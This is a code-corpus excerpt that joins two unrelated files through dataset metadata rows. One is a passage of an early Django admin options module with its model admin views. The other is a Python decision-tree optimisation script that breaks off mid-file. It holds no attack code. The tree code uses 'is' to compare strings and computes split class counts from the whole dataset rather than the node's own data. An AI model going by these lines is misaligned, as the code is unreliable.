include_blank = db_field.blank,
blank_choice=[('', _('None'))]
)
return db_field.formfield(**kwargs)
else:
# Otherwise, use the default select widget.
return db_field.formfield(**kwargs)
# For DateTimeFields, use a special field and widget.
if isinstance(db_field, models.DateTimeField):
kwargs['form_class'] = forms.SplitDateTimeField
kwargs['widget'] = widgets.AdminSplitDateTime()
return db_field.formfield(**kwargs)
# For DateFields, add a custom CSS class.
if isinstance(db_field, models.DateField):
kwargs['widget'] = widgets.AdminDateWidget
return db_field.formfield(**kwargs)
# For TimeFields, add a custom CSS class.
if isinstance(db_field, models.TimeField):
kwargs['widget'] = widgets.AdminTimeWidget
return db_field.formfield(**kwargs)
# For TextFields, add a custom CSS class.
if isinstance(db_field, models.TextField):
kwargs['widget'] = widgets.AdminTextareaWidget
return db_field.formfield(**kwargs)
# For URLFields, add a custom CSS class.
if isinstance(db_field, models.URLField):
kwargs['widget'] = widgets.AdminURLFieldWidget
return db_field.formfield(**kwargs)
# For IntegerFields, add a custom CSS class.
if isinstance(db_field, models.IntegerField):
kwargs['widget'] = widgets.AdminIntegerFieldWidget
return db_field.formfield(**kwargs)
# For CommaSeparatedIntegerFields, add a custom CSS class.
if isinstance(db_field, models.CommaSeparatedIntegerField):
kwargs['widget'] = widgets.AdminCommaSeparatedIntegerFieldWidget
return db_field.formfield(**kwargs)
# For TextInputs, add a custom CSS class.
if isinstance(db_field, models.CharField):
kwargs['widget'] = widgets.AdminTextInputWidget
return db_field.formfield(**kwargs)
# For FileFields and ImageFields add a link to the current file.
if isinstance(db_field, models.ImageField) or isinstance(db_field, models.FileField):
kwargs['widget'] = widgets.AdminFileWidget
return db_field.formfield(**kwargs)
# For ForeignKey or ManyToManyFields, use a special widget.
if isinstance(db_field, (models.ForeignKey, models.ManyToManyField)):
if isinstance(db_field, models.ForeignKey) and db_field.name in self.raw_id_fields:
kwargs['widget'] = widgets.ForeignKeyRawIdWidget(db_field.rel)
elif isinstance(db_field, models.ForeignKey) and db_field.name in self.radio_fields:
kwargs['widget'] = widgets.AdminRadioSelect(attrs={
'class': get_ul_class(self.radio_fields[db_field.name]),
})
kwargs['empty_label'] = db_field.blank and _('None') or None
else:
if isinstance(db_field, models.ManyToManyField):
# If it uses an intermediary model, don't show field in admin.
if db_field.rel.through is not None:
return None
elif db_field.name in self.raw_id_fields:
kwargs['widget'] = widgets.ManyToManyRawIdWidget(db_field.rel)
kwargs['help_text'] = ''
elif db_field.name in (list(self.filter_vertical) + list(self.filter_horizontal)):
kwargs['widget'] = widgets.FilteredSelectMultiple(db_field.verbose_name, (db_field.name in self.filter_vertical))
# Wrap the widget's render() method with a method that adds
# extra HTML to the end of the rendered output.
formfield = db_field.formfield(**kwargs)
# Don't wrap raw_id fields. Their add function is in the popup window.
if not db_field.name in self.raw_id_fields:
# formfield can be None if it came from a OneToOneField with
# parent_link=True
if formfield is not None:
formfield.widget = widgets.RelatedFieldWidgetWrapper(formfield.widget, db_field.rel, self.admin_site)
return formfield
# For any other type of field, just call its formfield() method.
return db_field.formfield(**kwargs)
def _declared_fieldsets(self):
if self.fieldsets:
return self.fieldsets
elif self.fields:
return [(None, {'fields': self.fields})]
return None
declared_fieldsets = property(_declared_fieldsets)
class ModelAdmin(BaseModelAdmin):
"Encapsulates all admin options and functionality for a given model."
__metaclass__ = forms.MediaDefiningClass
list_display = ('__str__',)
list_display_links = ()
list_filter = ()
list_select_related = False
list_per_page = 100
search_fields = ()
date_hierarchy = None
save_as = False
save_on_top = False
ordering = None
inlines = []
# Custom templates (designed to be over-ridden in subclasses)
change_form_template = None
change_list_template = None
delete_confirmation_template = None
object_history_template = None
def __init__(self, model, admin_site):
self.model = model
self.opts = model._meta
self.admin_site = admin_site
self.inline_instances = []
for inline_class in self.inlines:
inline_instance = inline_class(self.model, self.admin_site)
self.inline_instances.append(inline_instance)
super(ModelAdmin, self).__init__()
def __call__(self, request, url):
# Delegate to the appropriate method, based on the URL.
if url is None:
return self.changelist_view(request)
elif url == "add":
return self.add_view(request)
elif url.endswith('/history'):
return self.history_view(request, unquote(url[:-8]))
elif url.endswith('/delete'):
return self.delete_view(request, unquote(url[:-7]))
else:
return self.change_view(request, unquote(url))
def _media(self):
from django.conf import settings
js = ['js/core.js', 'js/admin/RelatedObjectLookups.js']
if self.prepopulated_fields:
js.append('js/urlify.js')
if self.opts.get_ordered_objects():
js.extend(['js/getElementsBySelector.js', 'js/dom-drag.js' , 'js/admin/ordering.js'])
return forms.Media(js=['%s%s' % (settings.ADMIN_MEDIA_PREFIX, url) for url in js])
media = property(_media)
def has_add_permission(self, request):
"Returns True if the given request has permission to add an object."
opts = self.opts
return request.user.has_perm(opts.app_label + '.' + opts.get_add_permission())
def has_change_permission(self, request, obj=None):
"""
Returns True if the given request has permission to change the given
Django model instance.
If `obj` is None, this should return True if the given request has
permission to change *any* object of the given type.
"""
opts = self.opts
return request.user.has_perm(opts.app_label + '.' + opts.get_change_permission())
def has_delete_permission(self, request, obj=None):
"""
Returns True if the given request has permission to change the given
Django model instance.
If `obj` is None, this should return True if the given request has
permission to delete *any* object of the given type.
"""
opts = self.opts
return request.user.has_perm(opts.app_label + '.' + opts.get_delete_permission())
def queryset(self, request):
"""
Returns a QuerySet of all model instances that can be edited by the
admin site. This is used by changelist_view.
"""
qs = self.model._default_manager.get_query_set()
# TODO: this should be handled by some parameter to the ChangeList.
ordering = self.ordering or () # otherwise we might try to *None, which is bad ;)
if ordering:
qs = qs.order_by(*ordering)
return qs
def get_fieldsets(self, request, obj=None):
"Hook for specifying fieldsets for the add form."
if self.declared_fieldsets:
return self.declared_fieldsets
form = self.get_form(request, obj)
return [(None, {'fields': form.base_fields.keys()})]
def get_form(self, request, obj=None, **kwargs):
"""
Returns a Form class for use in the admin add view. This is used by
add_view and change_view.
"""
if self.declared_fieldsets:
fields = flatten_fieldsets(self.declared_fieldsets)
else:
fields = None
if self.exclude is None:
exclude = []
else:
exclude = list(self.exclude)
defaults = {
"form": self.form,
"fields": fields,
"exclude": exclude + kwargs.get("exclude", []),
"formfield_callback": self.formfield_for_dbfield,
}
defaults.update(kwargs)
return modelform_factory(self.model, **defaults)
def get_formsets(self, request, obj=None):
for inline in self.inline_instances:
yield inline.get_formset(request, obj)
def log_addition(self, request, object):
"""
Log that an object has been successfully added.
The default implementation creates an admin LogEntry object.
"""
from django.contrib.admin.models import LogEntry, ADDITION
LogEntry.objects.log_action(
user_id = request.user.pk,
content_type_id = ContentType.objects.get_for_model(object).pk,
object_id = object.pk,
object_repr = force_unicode(object),
action_flag = ADDITION
)
def log_change(self, request, object, message):
"""
Log that an object has been successfully changed.
The default implementation creates an admin LogEntry object.
"""
from django.contrib.admin.models import LogEntry, CHANGE
LogEntry.objects.log_action(
user_id = request.user.pk,
content_type_id = ContentType.objects.get_for_model(object).pk,
object_id = object.pk,
object_repr = force_unicode(object),
action_flag = CHANGE,
change_message = message
)
def log_deletion(self, request, object, object_repr):
"""
Log that an object has been successfully deleted. Note that since the
object is deleted, it might no longer be safe to call *any* methods
on the object, hence this method getting object_repr.
The default implementation creates an admin LogEntry object.
"""
from django.contrib.admin.models import LogEntry, DELETION
LogEntry.objects.log_action(
user_id = request.user.id,
content_type_id = ContentType.objects.get_for_model(self.model).pk,
object_id = object.pk,
object_repr = object_repr,
action_flag = DELETION
)
def construct_change_message(self, request, form, formsets):
"""
Construct a change message from a changed object.
"""
change_message = []
if form.changed_data:
change_message.append(_('Changed %s.') % get_text_list(form.changed_data, _('and')))
if formsets:
for formset in formsets:
for added_object in formset.new_objects:
change_message.append(_('Added %(name)s "%(object)s".')
% {'name': added_object._meta.verbose_name,
'object': force_unicode(added_object)})
for changed_object, changed_fields in formset.changed_objects:
change_message.append(_('Changed %(list)s for %(name)s "%(object)s".')
% {'list': get_text_list(changed_fields, _('and')),
'name': changed_object._meta.verbose_name,
'object': force_unicode(changed_object)})
for deleted_object in formset.deleted_objects:
change_message.append(_('Deleted %(name)s "%(object)s".')
% {'name': deleted_object._meta.verbose_name,
'object': force_unicode(deleted_object)})
change_message = ' '.join(change_message)
return change_message or _('No fields changed.')
def message_user(self, request, message):
"""
Send a message to the user. The default implementation
posts a message using the auth Message object.
"""
request.user.message_set.create(message=message)
def save_form(self, request, form, change):
"""
Given a ModelForm return an unsaved instance. ``change`` is True if
the object is being changed, and False if it's being added.
"""
return form.save(commit=False)
def save_model(self, request, obj, form, change):
"""
Given a model instance save it to the database.
"""
obj.save()
def save_formset(self, request, form, formset, change):
"""
Given an inline formset save it to the database.
"""
formset.save()
def render_change_form(self, request, context, add=False, change=False, form_url='', obj=None):
opts = self.model._meta
app_label = opts.app_label
ordered_objects = opts.get_ordered_objects()
context.update({
'add': add,
'change': change,
'has_add_permission': self.has_add_permission(request),
'has_change_permission': self.has_change_permission(request, obj),
'has_delete_permission': self.has_delete_permission(request, obj),
'has_file_field': True, # FIXME - this should check if form or formsets have a FileField,
'has_absolute_url': hasattr(self.model, 'get_absolute_url'),
'ordered_objects': ordered_objects,
'form_url': mark_safe(form_url),
'opts': opts,
'content_type_id': ContentType.objects.get_for_model(self.model).id,
'save_as': self.save_as,
'save_on_top': self.save_on_top,
'root_path': self.admin_site.root_path,
})
return render_to_response(self.change_form_template or [
"admin/%s/%s/change_form.html" % (app_label, opts.object_name.lower()),
"admin/%s/change_form.html" % app_label,
"admin/change_form.html"
], context, context_instance=template.RequestContext(request))
def response_add(self, request, obj, post_url_continue='../%s/'):
"""
Determines the HttpResponse for the add_view stage.
"""
opts = obj._meta
pk_value = obj._get_pk_val()
msg = _('The %(name)s "%(obj)s" was added successfully.') % {'name': force_unicode(opts.verbose_name), 'obj': force_unicode(obj)}
# Here, we distinguish between different save types by checking for
# the presence of keys in request.POST.
if request.POST.has_key("_continue"):
self.message_user(request, msg + ' ' + _("You may edit it again below."))
if request.POST.has_key("_popup"):
post_url_continue += "?_popup=1"
return HttpResponseRedirect(post_url_continue % pk_value)
if request.POST.has_key("_popup"):
return HttpResponse('<script type="text/javascript">opener.dismissAddAnotherPopup(window, "%s", "%s");</script>' % \
# escape() calls force_unicode.
(escape(pk_value), escape(obj)))
elif request.POST.has_key("_addanother"):
self.message_user(request, msg + ' ' + (_("You may add another %s below.") % force_unicode(opts.verbose_name)))
return HttpResponseRedirect(request.path)
else:
self.message_user(request, msg)
# Figure out where to redirect. If the user has change permission,
# redirect to the change-list page for this object. Otherwise,
# redirect to the admin index.
if self.has_change_permission(request, None):
post_url = '../'
else:
post_url = '../../../'
return HttpResponseRedirect(post_url)
def response_change(self, request, obj):
"""
Determines the HttpResponse for the change_view stage.
"""
opts = obj._meta
pk_value = obj._get_pk_val()
msg = _('The %(name)s "%(obj)s" was changed successfully.') % {'name': force_unicode(opts.verbose_name), 'obj': force_unicode(obj)}
if request.POST.has_key("_continue"):
self.message_user(request, msg + ' ' + _("You may edit it again below."))
if request.REQUEST.has_key('_popup'):
return HttpResponseRedirect(request.path + "?_popup=1")
else:
return HttpResponseRedirect(request.path)
elif request.POST.has_key("_saveasnew"):
msg = _('The %(name)s "%(obj)s" was added successfully. You may edit it again below.') % {'name': force_unicode(opts.verbose_name), 'obj': obj}
self.message_user(request, msg)
return HttpResponseRedirect("../%s/" % pk_value)
elif request.POST.has_key("_addanother"):
self.message_user(request, msg + ' ' + (_("You may add another %s below.") % force_unicode(opts.verbose_name)))
return HttpResponseRedirect("../add/")
else:
self.message_user(request, msg)
return HttpResponseRedirect("../")
def add_view(self, request, form_url='', extra_context=None):
"The 'add' admin view for this model."
model = self.model
opts = model._meta
if not self.has_add_permission(request):
raise PermissionDenied
ModelForm = self.get_form(request)
formsets = []
if request.method == 'POST':
form = ModelForm(request.POST, request.FILES)
if form.is_valid():
form_validated = True
new_object = self.save_form(request, form, change=False)
else:
form_validated = False
new_object = self.model()
for FormSet in self.get_formsets(request):
formset = FormSet(data=request.POST, files=request.FILES,
instance=new_object,
save_as_new=request.POST.has_key("_saveasnew"))
formsets.append(formset)
if all_valid(formsets) and form_validated:
self.save_model(request, new_object, form, change=False)
form.save_m2m()
for formset in formsets:
self.save_formset(request, form, formset, change=False)
self.log_addition(request, new_object)
return self.response_add(request, new_object)
else:
# Prepare the dict of initial data from the request.
# We have to special-case M2Ms as a list of comma-separated PKs.
initial = dict(request.GET.items())
for k in initial:
try:
f = opts.get_field(k)
except models.FieldDoesNotExist:
continue
if isinstance(f, models.ManyToManyField):
initial[k] = initial[k].split(",")
form = ModelForm(initial=initial)
for FormSet in self.get_formsets(request):
formset = FormSet(instance=self.model())
formsets.append(formset)
adminForm = helpers.AdminForm(form, list(self.get_fieldsets(request)), self.prepopulated_fields)
media = self.media + adminForm.media
inline_admin_formsets = []
for inline, formset in zip(self.inline_instances, formsets):
fieldsets = list(inline.get_fieldsets(request))
inline_admin_formset = helpers.InlineAdminFormSet(inline, formset, fieldsets)
inline_admin_formsets.append(inline_admin_formset)
media = media + inline_admin_formset.media
context = {
'title': _('Add %s') % force_unicode(opts.verbose_name),
'adminform': adminForm,
'is_popup': request.REQUEST.has_key('_popup'),
'show_delete': False,
'media': mark_safe(media),
'inline_admin_formsets': inline_admin_formsets,
'errors': helpers.AdminErrorList(form, formsets),
'root_path': self.admin_site.root_path,
'app_label': opts.app_label,
}
context.update(extra_context or {})
return self.render_change_form(request, context, add=True)
add_view = transaction.commit_on_success(add_view)
def change_view(self, request, object_id, extra_context=None):
"The 'change' admin view for this model."
model = self.model
opts = model._meta
try:
obj = model._default_manager.get(pk=object_id)
except model.DoesNotExist:
# Don't raise Http404 just yet, because we haven't checked
# permissions yet. We don't want an unauthenticated user to be able
# to determine whether a given object exists.
obj = None
if not self.has_change_permission(request, obj):
raise PermissionDenied
if obj is None:
raise Http404(_('%(name)s object with primary key %(key)r does not exist.') % {'name': force_unicode(opts.verbose_name), 'key': escape(object_id)})
if request.method == 'POST' and request.POST.has_key("_saveasnew"):
return self.add_view(request, form_url='../../add/')
ModelForm = self.get_form(request, obj)
formsets = []
if request.method == 'POST':
form = ModelForm(request.POST, request.FILES, instance=obj)
if form.is_valid():
form_validated = True
new_object = self.save_form(request, form, change=True)
else:
form_validated = False
new_object = obj
for FormSet in self.get_formsets(request, new_object):
formset = FormSet(request.POST, request.FILES,
instance=new_object)
formsets.append(formset)
if all_valid(formsets) and form_validated:
self.save_model(request, new_object, form, change=True)
form.save_m2m()
for formset in formsets:
self.save_formset(request, form, formset, change=True)
change_message = self.construct_change_message(request, form, formsets)
self.log_change(request, new_object, change_message)
return self.response_change(request, new_object)
else:
form = ModelForm(instance=obj)
for FormSet in self.get_formsets(request, obj):
formset = FormSet(instance=obj)
formsets.append(formset)
adminForm = helpers.AdminForm(form, self.get_fieldsets(request, obj), self.prepopulated_fields)
media = self.media + adminForm.media
inline_admin_formsets = []
for inline, formset in zip(self.inline_instances, formsets):
fieldsets = list(inline.get_fieldsets(request, obj))
inline_admin_formset = helpers.InlineAdminFormSet(inline, formset, fieldsets)
inline_admin_formsets.append(inline_admin_formset)
media = media + inline_admin_formset.media
context = {
'title': _('Change %s') % force_unicode(opts.verbose_name),
'adminform': adminForm,
'object_id': object_id,
'original': obj,
'is_popup': request.REQUEST.has_key('_popup'),
'media': mark_safe(media),
'inline_admin_formsets': inline_admin_formsets,
'errors': helpers.AdminErrorList(form, formsets),
'root_path': self.admin_site.root_path,
'app_label': opts.app_label,
}
context.update(extra_context or {})
return self.render_change_form(request, context, change=True, obj=obj)
change_view = transaction.commit_on_success(change_view)
def changelist_view(self, request, extra_context=None):
"The 'change list' admin view for this model."
from django.contrib.admin.views.main import ChangeList, ERROR_FLAG
opts = self.model._meta
app_label = opts.app_label
if not self.has_change_permission(request, None):
raise PermissionDenied
try:
cl = ChangeList(request, self.model, self.list_display, self.list_display_links, self.list_filter,
self.date_hierarchy, self.search_fields, self.list_select_related, self.list_per_page, self)
except IncorrectLookupParameters:
# Wacky lookup parameters were given, so redirect to the main
# changelist page, without parameters, and pass an 'invalid=1'
# parameter via the query string. If wacky parameters were given and
# the 'invalid=1' parameter was already in the query string, something
# is screwed up with the database, so display an error page.
if ERROR_FLAG in request.GET.keys():
return render_to_response('admin/invalid_setup.html', {'title': _('Database error')})
return HttpResponseRedirect(request.path + '?' + ERROR_FLAG + '=1')
context = {
'title': cl.title,
'is_popup': cl.is_popup,
'cl': cl,
'has_add_permission': self.has_add_permission(request),
'root_path': self.admin_site.root_path,
'app_label': app_label,
}
context.update(extra_context or {})
return render_to_response(self.change_list_template or [
'admin/%s/%s/change_list.html' % (app_label, opts.object_name.lower()),
'admin/%s/change_list.html' % app_label,
'admin/change_list.html'
], context, context_instance=template.RequestContext(request))
def delete_view(self, request, object_id, extra_context=None):
"The 'delete' admin view for this model."
opts = self.model._meta
app_label = opts.app_label
try:
obj = self.model._default_manager.get(pk=object_id)
except self.model.DoesNotExist:
# Don't raise Http404 just yet, because we haven't checked
# permissions yet. We don't want an unauthenticated user to be able
# to determine whether a given object exists.
obj = None
if not self.has_delete_permission(request, obj):
raise PermissionDenied
if obj is None:
raise Http404(_('%(name)s object with primary key %(key)r does not exist.') % {'name': force_unicode(opts.verbose_name), 'key': escape(object_id)})
# Populate deleted_objects, a data structure of all related objects that
# will also be deleted.
deleted_objects = [mark_safe(u'%s: <a href="../../%s/">%s</a>' % (escape(force_unicode(capfirst(opts.verbose_name))), quote(object_id), escape(obj))), []]
perms_needed = set()
get_deleted_objects(deleted_objects, perms_needed, request.user, obj, opts, 1, self.admin_site)
if request.POST: # The user has already confirmed the deletion.
if perms_needed:
raise PermissionDenied
obj_display = force_unicode(obj)
obj.delete()
self.log_deletion(request, obj, obj_display)
self.message_user(request, _('The %(name)s "%(obj)s" was deleted successfully.') % {'name': force_unicode(opts.verbose_name), 'obj': force_unicode(obj_display)})
if not self.has_change_permission(request, None):
return HttpResponseRedirect("../../../../")
return HttpResponseRedirect("../../")
context = {
"title": _("Are you sure?"),
"object_name": force_unicode(opts.verbose_name),
"object": obj,
"deleted_objects": deleted_objects,
"perms_lacking": perms_needed,
"opts": opts,
"root_path": self.admin_site.root_path,
"app_label": app_label,
}
context.update(extra_context or {})
return render_to_response(self.delete_confirmation_template or [
"admin/%s/%s/delete_confirmation.html" % (app_label, opts.object_name.lower()),
"admin/%s/delete_confirmation.html" % app_label,
"admin/delete_confirmation.html"
], context, context_instance=template.RequestContext(request))
def history_view(self, request, object_id, extra_context=None):
"The 'history' admin view for this model."
from django.contrib.admin.models import LogEntry
model = self.model
opts = model._meta
app_label = opts.app_label
action_list = LogEntry.objects.filter(
object_id = object_id,
content_type__id__exact = ContentType.objects.get_for_model(model).id
).select_related().order_by('action_time')
# If no history was found, see whether this object even exists.
obj = get_object_or_404(model, pk=object_id)
context = {
'title': _('Change history: %s') % force_unicode(obj),
'action_list': action_list,
'module_name': capfirst(force_unicode(opts.verbose_name_plural)),
'object': obj,
'root_path': self.admin_site.root_path,
'app_label': app_label,
}
context.update(extra_context or {})
return render_to_response(self.object_history_template or [
"admin/%s/%s/object_history.html" % (app_label, opts.object_name.lower()),
"admin/%s/object_history.html" % app_label,
"admin/object_history.html"
], context, context_instance=template.RequestContext(request))
class InlineModelAdmin(BaseModelAdmin):
"""
Options for inline editing of ``model`` instances.
Provide ``name`` to specify the attribute name of the ``ForeignKey`` from
``model`` to its parent. This is required if ``model`` has more than one
``ForeignKey`` to its parent.
"""
model = None
fk_name = None
formset = BaseInlineFormSet
extra = 3
max_num = 0
template = None
verbose_name = None
verbose_name_plural = None
def __init__(self, parent_model, admin_site):
self.admin_site = admin_site
self.parent_model = parent_model
self.opts = self.model._meta
super(InlineModelAdmin, self).__init__()
if self.verbose_name is None:
self.verbose_name = self.model._meta.verbose_name
if self.verbose_name_plural is None:
self.verbose_name_plural = self.model._meta.verbose_name_plural
def _media(self):
from django.conf import settings
js = []
if self.prepopulated_fields:
js.append('js/urlify.js')
if self.filter_vertical or self.filter_horizontal:
js.extend(['js/SelectBox.js' , 'js/SelectFilter2.js'])
return forms.Media(js=['%s%s' % (settings.ADMIN_MEDIA_PREFIX, url) for url in js])
media = property(_media)
def get_formset(self, request, obj=None, **kwargs):
"""Returns a BaseInlineFormSet class for use in admin add/change views."""
if self.declared_fieldsets:
fields = flatten_fieldsets(self.declared_fieldsets)
else:
fields = None
if self.exclude is None:
exclude = []
else:
exclude = list(self.exclude)
defaults = {
"form": self.form,
"formset": self.formset,
"fk_name": self.fk_name,
"fields": fields,
"exclude": exclude + kwargs.get("exclude", []),
"formfield_callback": self.formfield_for_dbfield,
"extra": self.extra,
"max_num": self.max_num,
}
defaults.update(kwargs)
return inlineformset_factory(self.parent_model, self.model, **defaults)
def get_fieldsets(self, request, obj=None):
if self.declared_fieldsets:
return self.declared_fieldsets
form = self.get_formset(request).form
return [(None, {'fields': form.base_fields.keys()})]
class StackedInline(InlineModelAdmin):
template = 'admin/edit_inline/stacked.html'
class TabularInline(InlineModelAdmin):
template = 'admin/edit_inline/tabular.html'
|
[
"[email protected]"
] | |
ea080f6a970422adc404cafa7a6c8b5224104598
|
4dea70c70d4ad0f8c761ecc619110b86a38f6721
|
/Optimization.py
|
3f1cfc402904003bfa2d5ab9394c3cf0567c0b50
|
[] |
no_license
|
homayunafra/Decision_Theoretic_Approach_for_Interpretability_in_Bayesian_Framework
|
af036a96e3eccae50b7ba6a4e5e021748d209e07
|
cb58964cc16b7ab6c3632da0d6066325b6f31d72
|
refs/heads/master
| 2023-04-06T02:48:51.729907 | 2021-04-29T08:48:11 | 2021-04-29T08:48:11 | 284,804,129 | 6 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 23,275 |
py
|
import tigraphs as tig
import numpy as np
import igraph as ig
from copy import deepcopy
from itertools import combinations
from math import log, floor, sqrt
from sklearn.model_selection import KFold
class DecisionNode(tig.BasicNode, object):
def __init__(self, **kwargs):
super().__init__(**kwargs)
self.pivot=None
self.split_attribute=None
self.left=None
self.right=None
self.children=None
self.parent=None
self.size=0
self.depth=0
self.local_data=None
self.mu=None
self.prob_vec=list()
self.predicted_class=None
# assign data points to a newly generated node.
def local_filter(self, data):
if self.parent == None:
self.size = len(data)
return data
attribute = self.parent.split_attribute
pivot = self.parent.pivot
if type(pivot) == set:
ret = data[attribute].isin(pivot)
else:
ret = data[attribute] <= pivot
if self == self.parent.left:
ret = data[ret]
else:
ret = data[~ret]
self.size = len(ret)
return ret
# find the leaf to which the datapoint belongs
def get_data_leaf(self, datapoint):
if self.children == None:
return self
else:
if type(self.pivot) == set:
if datapoint[self.split_attribute] in self.pivot:
return self.left.get_data_leaf(datapoint)
else:
return self.right.get_data_leaf(datapoint)
else:
if datapoint[self.split_attribute] <= self.pivot:
return self.left.get_data_leaf(datapoint)
else:
return self.right.get_data_leaf(datapoint)
class DecisionTree(tig.return_tree_class(directed=True), object):
def __init__(self, Vertex = DecisionNode, **kwargs):
super().__init__(N=2, Vertex=Vertex, **kwargs)
# these are default, can be set by train
self.data_type_dict = {}
self.tree_kind = None
self.min_node_size = 1
self.max_node_depth = 5
self.data = None
self.data_size = 0
self.response = '' # response attribute
def fuse_vertex(self, vertex):
super().fuse_vertex(vertex)
vertex.left, vertex.right = None, None
vertex.pivot, vertex.split_attribute = None, None
# construct the tree using training data and an empty root vertex
def grow_tree(self, ref):
self.data_size = len(self.data)
self.create_vertex()
self.set_root(self.vertices[0])
self.leaves.add(self.vertices[0])
self.grow_node(self.get_root(), ref)
# grow each node until reaching the stopping condition
def grow_node(self, node, ref):
if node.parent is None:
node.local_data = node.local_filter(data=self.data)
if self.tree_kind is 'regression':
self.set_node_mu_ml(node, ref)
else:
self.set_node_prob_vec(node)
if self.stopping_condition(node):
return
else:
try:
# select the best split (the one with minimum negative log-likelihood score)
best_split = min(self.iter_split_eval(node, ref), key=lambda x: x[0])
# no split has been selected yet, so fuse the node to erase the last split generated by iter_split()
self.fuse_vertex(node)
except ValueError:
return
if self.tree_kind is 'regression':
''' compute the MLE estimate of the variance parameter of the tree before splitting any internal nodes.
check Step 1 of optimization algorithm in Section 3.2.1 of the paper '''
sigma = sum(self.get_node_sse(leaf, ref) for leaf in self.leaves) / self.data_size
base_impurity = node.size * log(sigma)
if base_impurity - best_split[0] <= 0:
return
# split the node based on the best split
self.split_vertex(node, split_attribute=best_split[1], pivot=best_split[2])
for child in node.children:
child.local_data = child.local_filter(data=node.local_data)
self.set_node_mu_ml(child, ref)
else:
value_count = self.data[self.response].value_counts()
node_class_ll = [value_count[key] * log(value_count[key] / node.size) for key in value_count.keys()]
node_neg_ll = -sum(node_class_ll)
if node_neg_ll - best_split[0] <= 0:
return
self.split_vertex(node, split_attribute=best_split[1], pivot=best_split[2])
for child in node.children:
child.local_data = child.local_filter(data=node.local_data)
self.set_node_prob_vec(node)
self.grow_node(node.left, ref)
self.grow_node(node.right, ref)
# prune the fully grown tree to avoid overfitting
def prune_tree(self, alpha, tst_data, ref, run, m_ind, output_path):
if alpha is None:
''' if alpha was none, we use cross-validation to construct a sequence of subtrees with their corresponding
alpha values, from which the best subtree will be selected as the pruned tree'''
subtree_ind = 1
subtree_seq = {}
alpha_seq = {}
while True:
try:
best_alpha, best_node = self.get_best_prune(ref)
self.fuse_vertex(best_node)
alpha_seq[subtree_ind] = best_alpha
subtree_seq[subtree_ind] = deepcopy(self)
subtree_ind += 1
except ValueError:
break
best_subtree_ind = self.cross_validate(alpha_seq, ref)
return subtree_seq[best_subtree_ind+1]
elif alpha == 0:
''' when alpha = 0, the algorithm prunes internal nodes one by one based on their prune cost with the goal
to construct the acc vs complexity plots (check Fig. 4 in the paper)'''
best_cost, best_node = self.get_best_prune(ref, alpha)
self.fuse_vertex(best_node)
treePerf = self.test(tst_data)
treeSize = len(self.leaves)
filename = output_path + "/result_proxy_" + str(m_ind) + "_" + str(run) + ".txt"
with open(filename, 'a+') as outputfile:
outputfile.write(str(treePerf) + "\t" + str(treeSize) + "\n")
outputfile.close()
if len(self.vertices) <= 3:
return
self.prune_tree(alpha, tst_data, ref, run, m_ind, output_path)
# 5-fold cross-validation for selecting the best \alpha and it's corresponding subtree
def cross_validate(self, alpha_seq_orig, ref):
# beta_seq = list()
beta_seq = [sqrt(alpha_seq_orig[i] * alpha_seq_orig[i + 1]) for i in range(1, len(alpha_seq_orig))]
# for i in range(1, len(alpha_seq_orig)):
# beta_seq.append(sqrt(alpha_seq_orig[i] * alpha_seq_orig[i + 1]))
beta_seq.append(100)
cv_perf = np.full((5, len(beta_seq)), 10.5)
cv = KFold(n_splits=5, random_state=42, shuffle=False)
y = self.data[self.response]
X = self.data.drop(self.response, axis=1)
fold_ind = 0
for train_index, test_index in cv.split(X):
X_train, X_val, y_train, y_val = X.loc[train_index], X.loc[test_index], y.loc[train_index], y.loc[
test_index]
X_train.loc[:, self.response] = y_train
X_val.loc[:, self.response] = y_val
if self.tree_kind is 'regression':
tree = RegressionTree()
tree.tree_kind = 'regression'
else:
tree = ClassificationTree()
tree.tree_kind = 'classification'
tree.data = X_train
tree.data_type_dict = self.data_type_dict
tree.response = self.response
tree.min_node_size = self.min_node_size
tree.max_node_depth = self.max_node_depth
tree.grow_tree(ref)
best_j = 0
while True:
try:
best_alpha, best_node = tree.get_best_prune(ref)
tree.fuse_vertex(best_node)
subtree_acc = tree.test(X_val)
j = min([index for index, value in enumerate(beta_seq) if best_alpha <= value])
if j == best_j:
cv_perf[fold_ind][j] = min(subtree_acc, cv_perf[fold_ind][j])
else:
cv_perf[fold_ind][j] = subtree_acc
best_j = j
except ValueError:
break
fold_ind += 1
min_index = np.argmin(np.mean(cv_perf, axis=0))
return min_index
# compute the negative log-likelihood score of each split
def iter_split_eval(self, node, ref):
for split in self.iter_split(node):
if node.children is None:
pass
else:
for child in node.children:
child.local_data = child.local_filter(node.local_data)
if node.left.size < self.min_node_size or node.right.size < self.min_node_size:
self.fuse_vertex(node)
continue
# compute the maximum likelihood estimate of the variance parameter of tree given the current split
if self.tree_kind is 'regression':
for child in node.children:
self.set_node_mu_ml(child, ref)
sigma = sum(self.get_node_sse(leaf, ref) for leaf in self.leaves) / self.data_size
left_impurity = node.left.size * log(sigma)
right_impurity = node.right.size * log(sigma)
split_impurity = left_impurity + right_impurity
else:
for child in node.children:
self.set_node_prob_vec(child)
value_count = self.data[self.response].value_counts()
class_ll_left = [value_count[key]*log(value_count[key] / node.left.size) for key in value_count.keys()]
left_purity = sum(class_ll_left)
class_ll_right = [value_count[key]*log(value_count[key] / node.right.size) for key in value_count.keys()]
right_purity = sum(class_ll_right)
split_impurity = -(left_purity + right_purity)
ret = [split_impurity, node.split_attribute, node.pivot]
yield ret
# access to all possible splits
def iter_split(self, node):
for attribute in self.data.columns:
if attribute != self.response and attribute != 'predictive_var':
for pivot in self.get_pivots(node.local_data, attribute):
self.fuse_vertex(node)
self.split_vertex(vertex=node, pivot=pivot,
split_attribute=attribute)
yield
# split the given vertex based on the given pivot and attribute
def split_vertex(self, vertex, split_attribute, pivot):
super(DecisionTree, self).split_vertex(vertex)
vertex.left = vertex.children[0]
vertex.left.depth = vertex.depth + 1
vertex.right = vertex.children[1]
vertex.right.depth = vertex.depth + 1
vertex.pivot, vertex.split_attribute = pivot, split_attribute
# accessing to all possible pivots of a given attribute
def get_pivots(self, data, attribute):
if self.data_type_dict[attribute] == 'ordinal':
max_pivot = max(data[attribute].unique())
for pivot in data[attribute].unique():
if pivot < max_pivot:
yield pivot
elif self.data_type_dict[attribute] == 'nominal':
values = data[attribute].unique()
n = len(values)
if n <= 1:
return
n = floor(float(n) / 2)
n = int(n)
for r in range(1, n + 1):
for pivot in combinations(values, r):
yield set(pivot)
def stopping_condition(self, node):
if self.max_node_depth <= node.depth:
return True
elif node.size <= self.min_node_size:
return True
else:
return False
def get_node_entropy(self, node):
